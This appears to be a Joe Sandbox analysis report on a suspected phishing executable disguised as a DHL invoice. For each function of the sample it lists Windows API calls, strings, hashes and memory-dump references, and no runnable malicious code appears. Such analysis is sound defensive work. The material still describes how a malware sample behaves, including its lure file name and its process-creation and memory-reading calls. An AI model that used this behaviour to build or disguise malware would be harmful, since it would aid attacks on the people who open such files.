Opcode Fuzzy Hash: 0f7849a1402d7f93c48a60be3df483ae0e55b57c33490089b147c0903641694c
Instruction Fuzzy Hash: E0F0C23492020FB7CB00FAA8EC85CAE7B6C6E10114B604565FB28965D0EF71DA95C589

Function 012B3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 012B302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 012B3044

Strings

aut, xrefs: 012B3038

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 05729836c9f004e5446edb88c3d43cd11d644ac396cbf0ea40eb8d041d64d5c1
Instruction ID: c6a756cd75e8f5224f80951806c26313a0677dbd7a7fb402cca0455c36638d95
Opcode Fuzzy Hash: 05729836c9f004e5446edb88c3d43cd11d644ac396cbf0ea40eb8d041d64d5c1
Instruction Fuzzy Hash: B2D05BB190131467DA30A695EC0EFC73A6CD704650F000255B655D2085DAB09594CBD0

Function 001B12A0 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 001B1A5B
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 001B1B13

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CreateMemoryRead
String ID:
API String ID: 2726527582-0
Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: 5753982d0addbec530030d7259c1157e138f2a22ac116648406342661fc0eae2
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: 55620A30A14258DBEB24CFA4C855BDEB372EF58300F5091A9E10DEB394E7799E81CB59

Function 012C7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 012C82F5
TerminateProcess.KERNEL32(00000000), ref: 012C82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 012C84DD

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 50fe4868c373c95ff0566b88adda130b1ffb65368ffb6dc477de54b78b3a4052
Instruction ID: 21961d0f7b7c2a602afd1e84d221c659bb0fda56cbe5144fbc661636e1471e50
Opcode Fuzzy Hash: 50fe4868c373c95ff0566b88adda130b1ffb65368ffb6dc477de54b78b3a4052
Instruction Fuzzy Hash: F6128C719183429FD724DF28C484B2ABBE1FF88714F048A5DEA898B352D771E945CF92

Function 01275AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b1648b742056455e0b86a9eb980b97a2fae7632a5d4ab4ca37f96175666b8e6
Instruction ID: cbc93816c19129a3e6f9d769a306d7ebd1ba7203396c6121473c354613eebc36
Opcode Fuzzy Hash: 5b1648b742056455e0b86a9eb980b97a2fae7632a5d4ab4ca37f96175666b8e6
Instruction Fuzzy Hash: BE51AC71D2020AAFDF219FA8D945BBFFBB8EF15310F04015AE605AB291D7719A418B61

Function 012410F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 01241BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 01241BF4
Part of subcall function 01241BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 01241BFC
Part of subcall function 01241BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 01241C07
Part of subcall function 01241BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 01241C12
Part of subcall function 01241BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 01241C1A
Part of subcall function 01241BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 01241C22

Part of subcall function 01241B4A: RegisterWindowMessageW.USER32(00000004,?,012412C4), ref: 01241BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0124136A
OleInitialize.OLE32 ref: 01241388
CloseHandle.KERNEL32(00000000), ref: 012824AB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d1f80b8538881fb502a290867e35e31b6849fee940bd6b2d78212604c9071b0f
Instruction ID: c30fb925e99f191ebcc4f153231b25f7703be19fe53f5328d4a1dfe0bf8ec3d0
Opcode Fuzzy Hash: d1f80b8538881fb502a290867e35e31b6849fee940bd6b2d78212604c9071b0f
Instruction Fuzzy Hash: A171B8B9922242CFC7A8EF79E4446E57EF8FB58754B48822ECA0AD7348EB304455CF44

Function 012454C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001), ref: 0124556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0124557D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e67167c1a4882c9d2f43322d4cd3addedef979aee2722b638720a7d468800cf9
Instruction ID: a99d250f3c37a6b54a79a52de0d18238f6d44b994b4074b65d3a7a67b9d1ec94
Opcode Fuzzy Hash: e67167c1a4882c9d2f43322d4cd3addedef979aee2722b638720a7d468800cf9
Instruction Fuzzy Hash: 75314C71A1020AEFDB18CF2CD880BA9BBB5FB48714F148229EA5997240D7B1F954CBD0

Function 012786AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 01278704
GetLastError.KERNEL32(?,012785CC,?,01308CC8,0000000C), ref: 0127870E
__dosmaperr.LIBCMT ref: 01278739

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 30dde3a2f0c6767154b3597c909267c0b77eeec90e620c04c6e701ea17bcf773
Instruction ID: f5f54692eff0cfa3dc5ec3b4a83bac3b15b2e8131295f36e526e8eaab214a215
Opcode Fuzzy Hash: 30dde3a2f0c6767154b3597c909267c0b77eeec90e620c04c6e701ea17bcf773
Instruction Fuzzy Hash: 7301FE33E362613EE6756338A44D77FAB4A4B92734F29011DEB199B1D2DEB1D4C1C250

Function 012B2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 012B2FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,012B2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 012B3006
CloseHandle.KERNEL32(00000000), ref: 012B300D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: eb1f19fdf371ee947aa5ba5a7cba728c3d91b6e516521943d0447d3ab408db08
Instruction ID: f3fd4217c15d8dfae7fb690e76c386500f496ed914251763b5a537ba6c3f25ef
Opcode Fuzzy Hash: eb1f19fdf371ee947aa5ba5a7cba728c3d91b6e516521943d0447d3ab408db08
Instruction Fuzzy Hash: C0E0863268122077E6302669FC0DFCB3E1CDB86B71F100214F719750C086A0551183A8

Function 01251310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 012517F6

Strings

CALL, xrefs: 012517C6

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 976258b900a8896f72016b5aa2af41bbd7b2d6e6a9da09b6df6f04018a671a4e
Instruction ID: 81be28ac8d54b620b75dd72defb0be7aa90b878f3ffeda41410863d8a890325b
Opcode Fuzzy Hash: 976258b900a8896f72016b5aa2af41bbd7b2d6e6a9da09b6df6f04018a671a4e
Instruction Fuzzy Hash: AA229B706282029FDB54DF18D4C4B2ABBF1FF89314F18891DE9968B351D771E851CB92

Function 012B6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012B6F6B

Part of subcall function 01244ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 012B6F5A, 012B6F63

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 0e5ad9e0026ffb31b4c3179038c83466e582eedf968a2bedc7f531e26dfa2e14
Instruction ID: c6c2fe239079104cdca75ef2f5e86f61e18790c1761700e642107b237db3fb24
Opcode Fuzzy Hash: 0e5ad9e0026ffb31b4c3179038c83466e582eedf968a2bedc7f531e26dfa2e14
Instruction Fuzzy Hash: 2FB1B2311242438FDB19EF24C4909BEB7E5FFA4744F04891DE996972A1EB30ED49CB91

Function 0127C827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 0127C84C

Strings

, xrefs: 0127C891

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: ede0bde99ef6233ec02d428a7fb860f03ded5afc3ee71281e99b809b9d4f3f67
Instruction ID: e5c54a2a1f27461159a5d029c8e6aac292482ca3a895019ed2d469e6451ec6ed
Opcode Fuzzy Hash: ede0bde99ef6233ec02d428a7fb860f03ded5afc3ee71281e99b809b9d4f3f67
Instruction Fuzzy Hash: 29415A7051828ADADB268E78CC84BFBBBEDEB55304F1804EDD68A87142D2359A55CF60

Function 01242DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 01282C8C

Part of subcall function 01243AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,01243A97,?,?,01242E7F,?,?,?,00000000), ref: 01243AC2

Part of subcall function 01242DA5: GetLongPathNameW.KERNELBASE ref: 01242DC4

Strings

X, xrefs: 01282C5A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 2d95086bdad8e25fa9b62d540846279cf0baad79eb460ff275a6ad0e3265ecbf
Instruction ID: f7d51f631a1ece11edb1cda2c36a8b76525de8cfe992d493ef8cc09e29eba07f
Opcode Fuzzy Hash: 2d95086bdad8e25fa9b62d540846279cf0baad79eb460ff275a6ad0e3265ecbf
Instruction Fuzzy Hash: F521D270A20298DFCB15EF94D805BEE7BFDAF59304F00805AE505B7284DBB45689CFA1

Function 012B2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 012B2587

Strings

EA06, xrefs: 012B25B9

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 690ddc19b5e3c65f97a9d0d846e9063b3f2dc2595b44b08b077773cb2fe5aec9
Instruction ID: 7ecee098c3d967a06a98735b93e13f3c4625192dd55da3f36bdf4b3ba2d9e2ff
Opcode Fuzzy Hash: 690ddc19b5e3c65f97a9d0d846e9063b3f2dc2595b44b08b077773cb2fe5aec9
Instruction Fuzzy Hash: 1C01F5B2814218BEDF28C7A8CC56EFEBBFC9B15201F00455AE153D21C1E4B4E6088B60

Function 01273467 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 012734D8

Strings

LCMapStringEx, xrefs: 01273478, 01273482

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 570edfe32d2e8db472e77949069514bf2641f760ec191d127fbbae9ca9c91c13
Instruction ID: 44940543a350d8556ebeb2c0417c7e32a898f80db2bf2956ca5f337ff6a85ef8
Opcode Fuzzy Hash: 570edfe32d2e8db472e77949069514bf2641f760ec191d127fbbae9ca9c91c13
Instruction Fuzzy Hash: 8801253265120DFBCF169F92DD05EEE3FA6EF58750F004158FE0566120CA728970EB85

Function 01273162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 012731A1

Strings

FlsAlloc, xrefs: 01273173, 0127317D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: c30e1c7bdf0a485d0195c77524584354724363a47266d60f9a0d3778bac6b6ad
Instruction ID: 25efdeffeb3833855505ff7f73a49304b718d0e4f080923683fd8b9e21b454a5
Opcode Fuzzy Hash: c30e1c7bdf0a485d0195c77524584354724363a47266d60f9a0d3778bac6b6ad
Instruction Fuzzy Hash: F3E05C31B5120CE7D3119B55EC0AD3E7BD8EF54710B40015DFD0557200CDB00E00D6DA

Function 01263600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 01263615

Strings

FlsAlloc, xrefs: 01263604, 0126360E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 737d3b8b49c4fe1d5ffd5637f87b3cec723ba26aec39d1199b16fdcf1a8a85c8
Instruction ID: 95bd0e658814418a786608fbf391e09773c4edb65338e4929885c40ce6411e68
Opcode Fuzzy Hash: 737d3b8b49c4fe1d5ffd5637f87b3cec723ba26aec39d1199b16fdcf1a8a85c8
Instruction Fuzzy Hash: 26D05B32B993346BD7113A95FE0AAA9BF49DF01AB2F0400A5FE0D962C0D9514A6187C9

Function 0127CB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0127C74F: GetOEMCP.KERNEL32(00000000), ref: 0127C77A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0127CA1D,?,00000000), ref: 0127CBF0
GetCPInfo.KERNEL32(00000000,0127CA1D,?,?,?,0127CA1D,?,00000000), ref: 0127CC03

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: c89583a7eb263e215af2f4776c10389143e068675213c8bdff54fc1b4de1fe6b
Instruction ID: 93f1b456e2d2a36c25481205a8e39cfc4dc9368a703b8df7ad4123fb0b842b4c
Opcode Fuzzy Hash: c89583a7eb263e215af2f4776c10389143e068675213c8bdff54fc1b4de1fe6b
Instruction Fuzzy Hash: BA517770A202078FEB25CF79C4846BBBFE8EF41310F14416ED2968B191D7789666CB90

Function 0127C9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 01272D74: GetLastError.KERNEL32(?,?,01275686,01283CD6,?,00000000,?,01275B6A,?,?,?,?,?,0126E6D1,?,01308A48), ref: 01272D78
Part of subcall function 01272D74: _free.LIBCMT ref: 01272DAB
Part of subcall function 01272D74: SetLastError.KERNEL32(00000000,?,?,?,?,0126E6D1,?,01308A48,00000010,01244F4A,?,?,00000000,01283CD6), ref: 01272DEC
Part of subcall function 01272D74: _abort.LIBCMT ref: 01272DF2

Part of subcall function 0127CADA: _abort.LIBCMT ref: 0127CB0C
Part of subcall function 0127CADA: _free.LIBCMT ref: 0127CB40

Part of subcall function 0127C74F: GetOEMCP.KERNEL32(00000000), ref: 0127C77A

_free.LIBCMT ref: 0127CA33
_free.LIBCMT ref: 0127CA69

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 92b61ff76206d36d353e79680f06e551990281434ceb03c22afc3e90e6b01a86
Instruction ID: db271f292f7b3e1a0dab05ecf27acd2db3a72211faf6a5e37b0409573cd18327
Opcode Fuzzy Hash: 92b61ff76206d36d353e79680f06e551990281434ceb03c22afc3e90e6b01a86
Instruction Fuzzy Hash: B131903191010BEFDB11EF7CD450AAABBE4AF40321F25019AE9049B291EB319E508B50

Function 01243837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 01243908

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

